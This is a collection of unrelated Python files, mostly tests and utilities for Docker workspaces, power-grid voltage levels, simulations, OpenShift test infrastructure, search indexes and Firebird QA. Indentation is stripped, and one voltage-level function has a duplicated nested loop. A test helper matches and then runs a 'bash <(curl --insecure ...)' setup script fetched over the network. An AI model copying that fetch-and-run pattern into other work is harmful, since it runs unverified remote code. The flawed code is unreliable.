runtime_group = RuntimeGroup(hosts=RUNTIME_NAMES)
for runtime_name in RUNTIME_NAMES:
assert runtime_name in runtime_group._runtimes
assert isinstance(runtime_group._runtimes[runtime_name], Runtime)
class TestRuntimeManager:
def test_create_group(self) -> None:
runtime_group = RuntimeManager().create_group()
for runtime_name in RUNTIME_NAMES:
assert runtime_name in runtime_group._runtimes
assert isinstance(runtime_group._runtimes[runtime_name], Runtime)
# -------------------------------------------------------------------------
def _remove_runtimes() -> None:
docker_client = docker.from_env()
for runtime_name in RUNTIME_NAMES:
try:
runtime_container = docker_client.containers.get(runtime_name)
runtime_container.remove(force=True)
except docker.errors.NotFound:
# TODO: handle create a docker container if not running as containerized test
print(f"Conatiner {runtime_name} not found")
# Delete ssh config as well, because the ssh setup fails
# when testing against multiple python versions
storm.delete(runtime_name)
def _get_current_container_id() -> str:
return run(
"awk -F/ '{ print $NF }' /proc/1/cpuset",
shell=True,
stdout=PIPE,
stderr=PIPE,
encoding="UTF-8",
).stdout.rstrip("\n")
def _start_runtime_container(name: str, client: docker.DockerClient) -> None:
try:
container = client.containers.run(
RUNTIME_DOCKER_IMAGE,
name=name,
environment={"WORKSPACE_NAME": name},
detach=True,
)
except docker.errors.APIError:
_remove_runtimes()
raise
container.reload()
ip_address = container.attrs["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]
os.environ[name] = ip_address
_wait_until_started(ip_address, WORKSPACE_PORT)
def _setup_ssh_connection_to_runtime(runtime_name: str) -> None:
runtime_host = os.getenv(runtime_name, "localhost")
response = requests.get(
f"http://{runtime_host}:{WORKSPACE_PORT}/tooling/ssh/setup-command?origin=http://{runtime_host}:{WORKSPACE_PORT}"
)
ssh_script_runner_regex = rf'^\/bin\/bash <\(curl -s --insecure "(http:\/\/{runtime_host}:{WORKSPACE_PORT}\/shared\/ssh\/setup\?token=[a-z0-9]+&host={runtime_host}&port={WORKSPACE_PORT})"\)$'
pattern = re.compile(ssh_script_runner_regex)
match = pattern.match(response.text)
assert match, "SSH setup script url not found"
# Execute the ssh setup script and automatically pass an ssh connection name to the script
script_url = match.groups()[0]
r = requests.get(script_url)
setup_script_path = "./setup-ssh.sh"
_remove_file_if_exists(setup_script_path)
with open(setup_script_path, "w") as file:
file.write(r.text)
# make the file executable for the user
os.chmod(setup_script_path, 0o744)
completed_process = run(
[f'/bin/bash -c "{setup_script_path}"'],
input=runtime_name,
encoding="ascii",
shell=True,
stdout=PIPE,
stderr=PIPE,
)
# child = pexpect.spawn(f"/bin/bash {setup_script_path}", encoding="UTF-8")
# child.expect("Provide a name .*")
# child.sendline(runtime_name)
# child.expect("remote_ikernel was detected .*")
# child.sendline("no")
# child.expect("Do you want to add this connection as mountable SFTP storage .*")
# child.sendline("no")
# child.close()
_remove_file_if_exists(setup_script_path)
assert completed_process.stderr == ""
assert "Connection successful!" in completed_process.stdout
def _wait_until_started(ip_address: str, workspace_port: Union[str, int]) -> None:
index = 0
health_url = f"http://{ip_address}:{str(workspace_port)}/healthy"
response = None
while response is None or (response.status_code != 200 and index < 15):
index += 1
time.sleep(1)
try:
response = requests.get(health_url, allow_redirects=False, timeout=2)
except requests.ConnectionError:
# Catch error that is raised when the workspace container is not reachable yet
pass
if index == 15:
print("The workspace did not start")
sys.exit(-1)
def _remove_file_if_exists(path: str) -> None:
try:
os.remove(path)
except OSError:
pass
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 by University of Kassel, Tu Dortmund, RWTH Aachen University and Fraunhofer
# Institute for Energy Economics and Energy System Technology (IEE) Kassel and individual
# contributors (see AUTHORS file for details). All rights reserved.
import numpy as np
from pandas import Series
from pandapower import element_bus_tuples
__author__ = "smeinecke"
def convert_voltlvl_to_int(voltage_level):
""" Returns voltage level names as int. """
if voltage_level in ["EHV", "ehv", "UHV", "uhv"]:
return 1
elif voltage_level in ["EHV-HV", "ehv-hv", "UHV-HV", "uhv-hv", "EHVHV", "ehvhv", "UHVHV",
"uhvhv"]:
return 2
elif voltage_level in ["HV", "hv"]:
return 3
elif voltage_level in ["HV-MV", "hv-mv", "HVMV", "hvmv"]:
return 4
elif voltage_level in ["MV", "mv"]:
return 5
elif voltage_level in ["MV-LV", "mv-lv", "MVLV", "mvlv"]:
return 6
elif voltage_level in ["LV", "lv"]:
return 7
else:
return int(voltage_level)
def convert_voltlvl_to_str(voltage_level):
""" Returns voltage level names as string. """
return ["EHV", "EHV-HV", "HV", "HV-MV", "MV", "MV-LV", "LV"][convert_voltlvl_to_int(
voltage_level)-1]
def convert_voltlvl_names(voltage_levels, desired_format):
""" Returns voltage level names in desired format.
EXAMPLE:
voltlvl_names = convert_voltlvl_names([1, 2, "hv", 4, 5, "ehv", 7], str)
"""
if desired_format == str:
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return convert_voltlvl_to_str(voltage_levels)
else:
names = []
for voltage_level in voltage_levels:
for voltage_level in voltage_levels:
names += [convert_voltlvl_to_str(voltage_level)]
return names
elif desired_format == int:
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return convert_voltlvl_to_int(voltage_levels)
else:
names = []
for voltage_level in voltage_levels:
for voltage_level in voltage_levels:
names += [convert_voltlvl_to_int(voltage_level)]
return names
else:
raise ValueError("desired_format must be str or int")
def _voltlvl_idx(net, element, voltage_level, branch_bus=None, vn_kv_limits=[145, 60, 1]):
""" similar to voltlvl_idx, but for only one voltage_level """
vn_kv_limits = [np.inf] + vn_kv_limits + [-np.inf]
voltage_level = convert_voltlvl_names(voltage_level, int)
lim_max = [0, 0, 1, 1, 2, 2, 3][voltage_level-1]
lim_min = [1, 2, 2, 3, 3, 4, 4][voltage_level-1]
Idx_bus = net.bus.index[(net.bus.vn_kv <= vn_kv_limits[lim_max]) &
(net.bus.vn_kv > vn_kv_limits[lim_min])]
if element == "bus":
return list(Idx_bus)
if branch_bus is None and element not in ["trafo", "trafo3w"]:
# for all other elements than trafos, take the first possibility
for elm, bus_name in element_bus_tuples():
if elm == element:
branch_bus = bus_name
break
if element == "measurement":
measurement_buses = Series(index=net.measurement.index)
# bus
bool_ = net.measurement.element_type == "bus"
measurement_buses.loc[bool_] = net.measurement.element.loc[bool_]
# line and trafo
for branch, side in zip(["line", "line", "trafo", "trafo"], ["from", "to", "hv", "lv"]):
bus = side + "_bus"
bool1 = net.measurement.element_type == branch
bool2 = net.measurement.side == side
measurement_buses.loc[bool1 & bool2] = net[branch][bus].loc[net.measurement.element.loc[
bool1 & bool2]].values
measurement_buses = measurement_buses.astype(int)
isin_Idx_bus = measurement_buses.isin(Idx_bus)
elif branch_bus in net[element].columns: # all other elements than measurement and bus
isin_Idx_bus = net[element][branch_bus].isin(Idx_bus)
else:
raise KeyError("For net[%s] there is no column '%s'. Please" % (element, str(branch_bus)) +
" give 'branch_bus' an valid bus column name, e.g. 'hv_bus' or 'lv_bus'.")
return list(net[element].index[isin_Idx_bus])
def voltlvl_idx(net, element, voltage_levels, branch_bus=None, vn_kv_limits=[145, 60, 1]):
"""
Returns indices of elements with special voltage level.
Even voltage_level numbers behave equally to both neighboring numbers, i.e. 4 == [3, 5] and
"EHV-HV" == ["EHV", "HV"].
EXAMPLE:
hv_and_mv_buses = voltlvl_idx(net, "bus", 4) # 4 == [3, 5]
hv_and_mv_buses = voltlvl_idx(net, "bus", [3, 5])
mv_loads = voltlvl_idx(net, "load", "MV")
hvmv_trafos = voltlvl_idx(net, "trafo", "HV", branch_bus="hv_bus")
hvmv_trafos = voltlvl_idx(net, "trafo", "MV", branch_bus="lv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", 2, branch_bus="hv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", [1, 3], branch_bus="hv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", 4, branch_bus="lv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", [3, 5], branch_bus="lv_bus")
ehvhv_trafos = voltlvl_idx(net, "trafo", 2, branch_bus="lv_bus")
ehv_measurements = voltlvl_idx(net, "measurement", "EHV")
"""
if not net[element].shape[0]:
return []
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return _voltlvl_idx(net, element, voltage_levels, branch_bus=branch_bus,
vn_kv_limits=vn_kv_limits)
else:
Idx = []
for voltage_level in voltage_levels:
Idx += _voltlvl_idx(net, element, voltage_level, branch_bus=branch_bus,
vn_kv_limits=vn_kv_limits)
return Idx
def get_voltlvl(voltage_values, vn_kv_limits=[145, 60, 1]):
""" Returns an array of voltage levels as integer. """
iter_ = hasattr(voltage_values, "__iter__")
voltage_values = voltage_values if iter_ else [voltage_values]
voltage_values = np.array(voltage_values)
voltage_levels = np.ones(voltage_values.shape)
for lim in vn_kv_limits:
voltage_levels[voltage_values <= lim] += 2
if iter_:
return voltage_levels.astype(int)
else:
return int(voltage_levels[0])
|
"""Example systems created in Python
"""
import numpy as np
from pysim.cythonsystem import Sys
class VanDerPol(Sys):
"""Simple example of a class representing a VanDerPol oscillator.
"""
def __init__(self):
self.add_state_scalar("x", "dx")
self.add_state_scalar("y", "dy")
self.add_input_scalar("a")
self.add_input_scalar("b")
self.inputs.a = 1.0
self.inputs.b = 1.0
self.states.x = 1.0
self.states.y = 0.0
def do_step(self,dummy):
"""Perform a timestep by implmenting the VanDerPol equations"""
a = self.inputs.a
b = self.inputs.b
x = self.states.x
y = self.states.y
self.ders.dx = a*x*(b-y*y)-y
self.ders.dy = x
class MassSpringDamper(Sys):
"""Simple class for testing the mass-spring-damper simulations with
a cython system"""
def __init__(self):
"""Setup two states (one dimensional vectors for now). Initial
conditions are simular to those in the build in c++ system"""
self.add_state_scalar("x1", "dx1")
self.add_state_scalar("x2", "dx2")
self.states.x1 = 1
self.states.x2 = 0
def do_step(self,dummy):
"""Perform a step using default constants, same as those in the
cpp system"""
m = 100.0
b = 1.0
k = 50.0
f = 0.0
x1 = self.states.x1
x2 = self.states.x2
self.ders.dx1 = x2
self.ders.dx2 =-k/m*x1-b/m*x2+1/m*f
class InOutTestSystem(Sys):
"""Python representation of the cpp InOutTestSystem
Used for testing that the cpp system behaves as the python system
with regards to the input output handling
"""
def __init__(self):
self.add_input_scalar("input_scalar")
self.add_input_vector("input_vector",3)
self.add_input_matrix("input_matrix",3,3)
self.add_state_scalar("state_scalar","der_scalar")
self.add_state_vector("state_vector","der_vector", 3)
self.add_state_matrix("state_matrix","der_matrix", 3, 3)
self.add_output_scalar("input_output_scalar")
self.add_output_vector("input_output_vector",3)
self.add_output_matrix("input_output_matrix",3,3)
self.add_output_scalar("state_output_scalar")
self.add_output_vector("state_output_vector",3)
self.add_output_matrix("state_output_matrix",3,3)
self.inputs.input_scalar = 0.0
self.inputs.input_vector = [0.0, 0.0, 0.0]
self.inputs.input_matrix = np.zeros((3,3))
self.outputs.input_output_scalar = 0.0
self.outputs.input_output_vector = [0.0, 0.0, 0.0]
self.outputs.input_output_matrix = np.zeros((3,3))
self.outputs.state_output_scalar = 0.0
self.outputs.state_output_vector = [0.0, 0.0, 0.0]
self.outputs.state_output_matrix = np.zeros((3,3))
self.states.state_scalar = 1.23
self.states.state_vector = np.ones(3)*4.56
self.states.state_matrix = np.ones((3,3))*7.89
self.ders.der_scalar = 0
self.ders.der_vector = np.zeros(3)
self.ders.der_matrix = np.zeros((3,3))
def do_step(self,dummy):
"""During a timestep we set the outputs to their respective inputs"""
self.outputs.input_output_scalar = self.inputs.input_scalar
self.outputs.input_output_vector = self.inputs.input_vector
self.outputs.input_output_matrix = self.inputs.input_matrix
self.outputs.state_output_scalar = self.states.state_scalar
self.outputs.state_output_vector = self.states.state_vector
self.outputs.state_output_matrix = self.states.state_matrix
|
from enum import Enum
from .durations import MINUTE, HOUR
class OpenshiftVersion(Enum):
VERSION_4_6 = "4.6"
VERSION_4_7 = "4.7"
VERSION_4_8 = "4.8"
VERSION_4_9 = "4.9"
class NetworkType:
OpenShiftSDN = "OpenShiftSDN"
OVNKubernetes = "OVNKubernetes"
WORKING_DIR = "build"
TF_FOLDER = f"{WORKING_DIR}/terraform"
TFVARS_JSON_NAME = "terraform.tfvars.json"
IMAGE_FOLDER = "/tmp/test_images"
TF_MAIN_JSON_NAME = "main.tf"
BASE_IMAGE_FOLDER = "/tmp/images"
IMAGE_NAME = "installer-image.iso"
STORAGE_PATH = "/var/lib/libvirt/openshift-images"
HOST_PASSTHROUGH_CPU_MODE = "host-passthrough"
MASTER_TF_CPU_MODE = HOST_PASSTHROUGH_CPU_MODE
WORKER_TF_CPU_MODE = HOST_PASSTHROUGH_CPU_MODE
NODES_REGISTERED_TIMEOUT = 20 * MINUTE
DEFAULT_CHECK_STATUSES_INTERVAL = 5
CLUSTER_INSTALLATION_TIMEOUT = HOUR
CLUSTER_INSTALLATION_TIMEOUT_OCS = 95 * MINUTE
START_CLUSTER_INSTALLATION_TIMEOUT = 6 * MINUTE
INSTALLING_IN_PROGRESS_TIMEOUT = 15 * MINUTE
VALIDATION_TIMEOUT = 6 * MINUTE
NTP_VALIDATION_TIMEOUT = 10 * MINUTE
OCS_VALIDATION_TIMEOUT = 10 * MINUTE
CNV_VALIDATION_TIMEOUT = 10 * MINUTE
READY_TIMEOUT = 15 * MINUTE
DISCONNECTED_TIMEOUT = 10 * MINUTE
PENDING_USER_ACTION_TIMEOUT = 30 * MINUTE
ERROR_TIMEOUT = 10 * MINUTE
TF_TEMPLATES_ROOT = "terraform_files"
TF_TEMPLATE_BARE_METAL_FLOW = f"{TF_TEMPLATES_ROOT}/baremetal"
TF_TEMPLATE_NONE_PLATFORM_FLOW = f"{TF_TEMPLATES_ROOT}/none"
TF_TEMPLATE_BARE_METAL_INFRA_ENV_FLOW = f"{TF_TEMPLATES_ROOT}/baremetal_infra_env"
TF_NETWORK_POOL_PATH = "/tmp/tf_network_pool.json"
NUMBER_OF_MASTERS = 3
TEST_INFRA = "test-infra"
CLUSTER = CLUSTER_PREFIX = "%s-cluster" % TEST_INFRA
INFRA_ENV_PREFIX = "%s-infra-env" % TEST_INFRA
TEST_NETWORK = "test-infra-net-"
TEST_SECONDARY_NETWORK = "test-infra-secondary-network-"
DEFAULT_CLUSTER_KUBECONFIG_DIR_PATH = "build/kubeconfig"
WAIT_FOR_BM_API = 15 * MINUTE
NAMESPACE_POOL_SIZE = 15
PODMAN_FLAGS = "--cgroup-manager=cgroupfs --storage-driver=vfs --events-backend=file"
DEFAULT_ADDITIONAL_NTP_SOURCE = "clock.redhat.com"
DEFAULT_BASE_DNS_DOMAIN = "redhat.com"
DEFAULT_NAMESPACE = 'assisted-installer'
DEFAULT_TEST_INFRA_DOMAIN = f".{CLUSTER_PREFIX}-{DEFAULT_NAMESPACE}.{DEFAULT_BASE_DNS_DOMAIN}"
TEST_TARGET_INTERFACE = "vnet3"
SUFFIX_LENGTH = 8
OCP_VERSIONS_JSON_PATH = "assisted-service/data/default_ocp_versions.json"
DEFAULT_IPV6_SERVICE_CIDR = "2003:db8::/112"
DEFAULT_IPV6_CLUSTER_CIDR = "2002:db8::/53"
DEFAULT_IPV6_HOST_PREFIX = 64
DEFAULT_PROXY_SERVER_PORT = 3129
DEFAULT_LOAD_BALANCER_PORT = 6443
IP_NETWORK_ASSET_FIELDS = (
"machine_cidr",
"machine_cidr6",
"provisioning_cidr",
"provisioning_cidr6",
)
REQUIRED_ASSET_FIELDS = (
"libvirt_network_if",
"libvirt_secondary_network_if",
*IP_NETWORK_ASSET_FIELDS,
)
class ImageType:
FULL_ISO = "full-iso"
MINIMAL_ISO = "minimal-iso"
class NodeRoles:
WORKER = "worker"
MASTER = "master"
AUTO_ASSIGN = "auto-assign"
class NodesStatus:
INSUFFICIENT = "insufficient"
KNOWN = "known"
INSTALLING = "installing"
INSTALLING_IN_PROGRESS = "installing-in-progress"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
INSTALLED = "installed"
ERROR = "error"
PENDING_FOR_INPUT = "pending-for-input"
DAY2_INSTALLED = "added-to-existing-cluster"
RESETING_PENDING_USER_ACTION = "resetting-pending-user-action"
DISCONNECTED = "disconnected"
INSUFFICIENT_UNBOUND = "insufficient-unbound"
KNOWN_UNBOUND = "known-unbound"
class ClusterStatus:
INSUFFICIENT = "insufficient"
INSTALLED = "installed"
READY = "ready"
PREPARING_FOR_INSTALLATION = "preparing-for-installation"
INSTALLING = "installing"
FINALIZING = "finalizing"
ERROR = "error"
PENDING_FOR_INPUT = "pending-for-input"
CANCELLED = "cancelled"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
class HostsProgressStages:
START_INSTALLATION = "Starting installation"
INSTALLING = "Installing"
WRITE_IMAGE_TO_DISK = "Writing image to disk"
WAIT_FOR_CONTROL_PLANE = "Waiting for control plane"
REBOOTING = "Rebooting"
WAIT_FOR_IGNITION = "Waiting for ignition"
JOINED = "Joined"
CONFIGURING = "Configuring"
DONE = "Done"
class AgentStatus:
VALIDATED = "Validated"
INSTALLED = "Installed"
REQUIREMENTS_MET = "RequirementsMet"
all_host_stages = [HostsProgressStages.START_INSTALLATION, HostsProgressStages.INSTALLING,
HostsProgressStages.WRITE_IMAGE_TO_DISK, HostsProgressStages.WAIT_FOR_CONTROL_PLANE,
HostsProgressStages.REBOOTING, HostsProgressStages.WAIT_FOR_IGNITION,
HostsProgressStages.CONFIGURING, HostsProgressStages.JOINED, HostsProgressStages.DONE]
class Events:
REGISTERED_CLUSTER = "Registered cluster"
SUCCESSFULLY_REGISTERED_CLUSTER = "Successfully registered cluster"
PENDING_FOR_INPUT = "to pending-for-input"
GENERATED_IMAGE = "Generated image (SSH public key is set)"
GENERATED_IMAGE_FULL = "Generated image (Image type is \"full-iso\", SSH public key is set)"
GENERATED_IMAGE_MINIMAL = "Generated image (Image type is \"minimal-iso\", SSH public key is set)"
DOWNLOAD_IMAGE = "Started image download"
STARTED_DOWNLOAD_IMAGE = "Started image download (image type is \"full-iso\")"
HOST_REGISTERED_TO_CLUSTER = ": registered to cluster"
INSUFFICIENT = "insufficient"
KNOWN = "to \"known\""
READY = "to ready"
CLUSTER_VALIDATION = "Cluster validation \'all-hosts-are-ready-to-install\' is now fixed"
PREPARING_FOR_INSTALLATION = "updated status from \"known\" to \"preparing-for-installation\""
PREPARING_SUCCESSFUL = "updated status from \"preparing-for-installation\" to \"preparing-successful\""
SET_BOOTSTRAP = "set as bootstrap"
INSTALLING = "updated status from \"preparing-successful\" to \"installing\""
CLUSTER_PREPARED = "Cluster was prepared successfully for installation"
CLUSTER_INSTALLING = "to installing"
INSTALLING_IN_PROGRESS = "updated status from \"installing\" to \"installing-in-progress\""
INSTALLATION_STAGE = "reached installation stage Starting installation"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
WRITING_IMAGE_TO_DISK = "reached installation stage Writing image to disk"
REBOOTING = "reached installation stage Rebooting"
CONTROL_PLANE = "reached installation stage Waiting for control plane"
IGNITION = "reached installation stage Waiting for ignition"
CONFIGURING = "reached installation stage Configuring"
JOINED = "reached installation stage Joined"
DONE = "reached installation stage Done"
CANCELLED_CLUSTER_INSTALLATION = "Cancelled cluster installation"
CANCELLED_FOR_HOST = "Installation cancelled for host"
CLUSTER_VERSION_DONE = "Operator cvo status: available message: Done"
CANCELLED_STATUS = "to \"cancelled\""
RESET_CLUSTER_INSTALLATION = "Reset cluster installation"
RESET_FOR_HOST = "Installation reset for host"
RESETTING_PENDING_USER_ACTION = "updated status from \"cancelled\" to \"resetting-pending-user-action\""
INSTALLED = "updated status from \"installing-in-progress\" to \"installed\""
FINALIZING = "to finalizing"
SUCCESSFULLY_INSTALLED = "Successfully finished installing cluster"
ERROR = "error"
DAY2_INSTALLED = "added-to-existing-cluster"
PROXY_SETTINGS_CHANGED = "Proxy settings changed"
class HostStatusInfo:
WRONG_BOOT_ORDER = "Expected the host to boot from disk, but it booted the installation image"
REBOOT_TIMEOUT = "Host failed to reboot within timeout"
class Platforms:
BARE_METAL = 'baremetal'
NONE = 'none'
VSPHERE = 'vsphere'
class HighAvailabilityMode:
FULL = 'Full'
NONE = 'None'
class BaseAsset:
MACHINE_CIDR = "192.168.127.0/24"
MACHINE_CIDR6 = "1001:db9::/120"
PROVISIONING_CIDR = "192.168.145.0/24"
PROVISIONING_CIDR6 = "3001:db9::/120"
NETWORK_IF = "tt1"
SECONDARY_NETWORK_IF = "stt1"
|
from gym.envs.registration import register
register(
id='SimpleFlappy-v0',
entry_point='gym_simpleflappy.envs:FlappyEnv',
)
register(
id='SimpleFlappyDistance-v0',
entry_point='gym_simpleflappy.envs:FlappyEnvDistance',
)
|
from haystack import indexes
from peeldb.models import (
JobPost,
Skill,
City,
FunctionalArea,
Industry,
Qualification,
State,
)
from datetime import datetime
from django.core import serializers
from mpcomp.views import get_absolute_url
class jobIndex(indexes.SearchIndex, indexes.Indexable):
"""
Indexing for job model
"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/job_text.txt"
)
title = indexes.CharField(model_attr="title")
designation = indexes.CharField(model_attr="job_role")
job_type = indexes.CharField(model_attr="job_type", faceted=True)
skills = indexes.MultiValueField()
location = indexes.MultiValueField()
slug = indexes.CharField(model_attr="slug")
min_year = indexes.IntegerField(model_attr="min_year")
max_year = indexes.IntegerField(model_attr="max_year")
min_month = indexes.IntegerField(model_attr="min_month")
max_month = indexes.IntegerField(model_attr="max_month")
min_salary = indexes.FloatField()
max_salary = indexes.FloatField()
industry = indexes.MultiValueField()
edu_qualification = indexes.MultiValueField()
functional_area = indexes.MultiValueField()
walkin_from_date = indexes.DateField(null=True, model_attr="walkin_from_date")
walkin_to_date = indexes.DateField(null=True, model_attr="walkin_to_date")
status = indexes.CharField(model_attr="status")
# posted_on = indexes.DateField(model_attr='posted_on')
created_on = indexes.DateField(model_attr="created_on")
description = indexes.CharField(model_attr="description")
post_url = indexes.CharField()
company_name = indexes.CharField(model_attr="company_name")
company = indexes.CharField(model_attr="company", null=True)
published_on = indexes.DateField(model_attr="published_on", null=True)
def get_model(self):
return JobPost
def prepare_post_url(self, obj):
return get_absolute_url(obj)
def prepare_skills(self, obj):
return [str(s.name) for s in obj.skills.filter(status="Active")]
def prepare_location(self, obj):
locations = serializers.serialize("json", obj.location.all())
return locations
def prepare_industry(self, obj):
return [str(s.name) for s in obj.industry.all()]
def prepare_functional_area(self, obj):
return [str(l.name) for l in obj.functional_area.all()]
def prepare_min_salary(self, obj):
if int(obj.min_salary) > 0:
return float(obj.min_salary) / 100000
else:
return 0.0
def prepare_max_salary(self, obj):
if int(obj.max_salary) > 0:
return float(obj.max_salary) / 100000
else:
return 0.0
def prepare_created_on(self, obj):
if obj.created_on:
current_date = datetime.strptime(str(obj.created_on), "%Y-%m-%d").strftime(
"%Y-%m-%d"
)
return current_date
return None
def prepare_published_on(self, obj):
if obj.published_on:
current_date = datetime.strptime(
str(obj.published_on.date()), "%Y-%m-%d"
).strftime("%Y-%m-%d")
return current_date
return None
def prepare_edu_qualification(self, obj):
return [str(s.name) for s in obj.edu_qualification.filter(status="Active")]
# def prepare_walkin_from_date(self, obj):
# if obj.walkin_from_date:
# current_date = datetime.strptime(str(obj.walkin_from_date), "%Y-%m-%d").strftime("%Y-%m-%d 00:00:00")
# return current_date
# return None
# def prepare_walkin_to_date(self, obj):
# if obj.walkin_to_date:
# current_date = datetime.strptime(str(obj.walkin_to_date), "%Y-%m-%d").strftime("%Y-%m-%d 00:00:00")
# return current_date
# return None
def index_queryset(self, using=None):
# from datetime import datetime
# current_date = datetime.strptime(str(datetime.now().date()), "%Y-%m-%d").strftime("%Y-%m-%d")
return (
self.get_model()
.objects.filter(status="Live")
.select_related("company", "user")
.prefetch_related(
"location", "edu_qualification", "industry", "skills", "functional_area"
)
)
class skillautoIndex(indexes.SearchIndex, indexes.Indexable):
"""
Index for autocompleate for designation and skills
"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/skill_text.txt"
)
skill_name = indexes.CharField(model_attr="name")
skill_slug = indexes.CharField(model_attr="slug")
no_of_jobposts = indexes.CharField()
status = indexes.CharField(model_attr="status")
def get_model(self):
return Skill
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Active")
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class locationIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/city_text.txt"
)
city_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
status = indexes.CharField(model_attr="status")
def get_model(self):
return City
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Enabled")
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class industryIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/industry_text.txt"
)
industry_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
industry_slug = indexes.CharField(model_attr="slug")
def get_model(self):
return Industry
def index_queryset(self, using=None):
return self.get_model().objects.all()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class functionalareaIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/functionalarea_text.txt"
)
functionalarea_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
def get_model(self):
return FunctionalArea
def index_queryset(self, using=None):
return self.get_model().objects.all()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class qualificationIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/qualification_text.txt"
)
edu_name = indexes.CharField(model_attr="name")
edu_slug = indexes.CharField(model_attr="slug")
no_of_jobposts = indexes.CharField()
def get_model(self):
return Qualification
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Active")
class stateIndex(indexes.SearchIndex, indexes.Indexable):
""" index for State"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/state_text.txt"
)
state_name = indexes.CharField(model_attr="name")
no_of_cities = indexes.CharField()
status = indexes.CharField(model_attr="status")
no_of_jobposts = indexes.CharField()
is_duplicate = indexes.BooleanField(default=False)
def get_model(self):
return State
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Enabled")
def prepare_no_of_cities(self, obj):
return obj.state.all().count()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
def prepare_is_duplicate(self, obj):
return obj.state.filter(name=obj.name).exists()
|
#coding:utf-8
#
# id: bugs.core_5097
# title: COMPUTED-BY expressions are not converted to their field type inside the engine
# decription:
#
# tracker_id: CORE-5097
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('^((?!sqltype|T2_CHECK|C1_CHECK).)*$', '')]
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table test1(
t0 timestamp default 'now'
,t1 timestamp computed by( 'now' )
,t2 computed by( extract(weekday from t1) )
);
recreate table test2 (n1 integer, c1 integer computed by (1.2));
commit;
insert into test1 default values;
insert into test2 values (0);
commit;
set list on;
set sqlda_display on;
select * from test1 rows 0;
select * from test2 rows 0;
set sqlda_display off;
select iif( t2 between 0 and 6, 1, 0 ) t2_check from test1;
select c1 || '' as c1_check from test2;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
01: sqltype: 510 TIMESTAMP Nullable scale: 0 subtype: 0 len: 8
02: sqltype: 510 TIMESTAMP Nullable scale: 0 subtype: 0 len: 8
03: sqltype: 500 SHORT Nullable scale: 0 subtype: 0 len: 2
01: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
02: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
T2_CHECK 1
C1_CHECK 1
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_expected_stdout == act_1.clean_stdout
|
from enum import Enum
from typing import Any
from importlib import import_module
class ValidationError(Exception):
"""
Error class for validation failed
"""
def __init__(self, payload: dict):
"""
:param message: error message
"""
self.payload = payload
def generate_err_msg(self, payload: dict, indent: int = 0) -> str:
"""
Generate human-friendly error message
example output:
key1: Error message
key2:
inner_key: error message
inner_key2:
key3: error message
"""
make_indent = ''.join([' ' for i in range(0, indent)])
previous_text = ''
for (key, errors) in payload.items():
for err in errors:
if isinstance(err, dict):
previous_text += '{}{}:\n'.format(make_indent, key)
previous_text += self.generate_err_msg(err, indent+1)
pass
else:
previous_text += '{}{}: {}\n'.format(make_indent, key, err)
pass
return previous_text
@property
def message(self):
return self.generate_err_msg(self.payload)
class CatConfig:
def __init__(self, format: str = 'json', validator_schema: dict = None, data: dict = None):
"""
:param format: Format of data used for read (json/toml/yaml)
:param validator_schema: Schema for validator (see https://docs.python-cerberus.org/en/stable/usage.html)
:param data: Config data
"""
self._parser = None
self._data = {}
if not data == None:
self._data = data
self._validator_schema = validator_schema
if format:
self._import_parser(format)
self._config = {}
def _import_parser(self, parser_name: str):
if parser_name == 'json':
self._parser = import_module('json')
elif parser_name == 'toml':
try:
self._parser = import_module('toml')
except ImportError:
raise Exception(
"CatConfig needs toml parser to work, "
"please add `toml` module to your project")
elif parser_name == 'yaml':
try:
self._parser = import_module('yaml')
# it works! I love Python!
self._parser.loads = self._parser.load
except ImportError:
raise Exception(
"CatConfig needs yaml parser to work, "
"please add `pyyaml` module to your project\n")
else:
raise Exception('Unsupported parser type')
def load_from_file(self, file_path: str, format: 'str' = None) -> None:
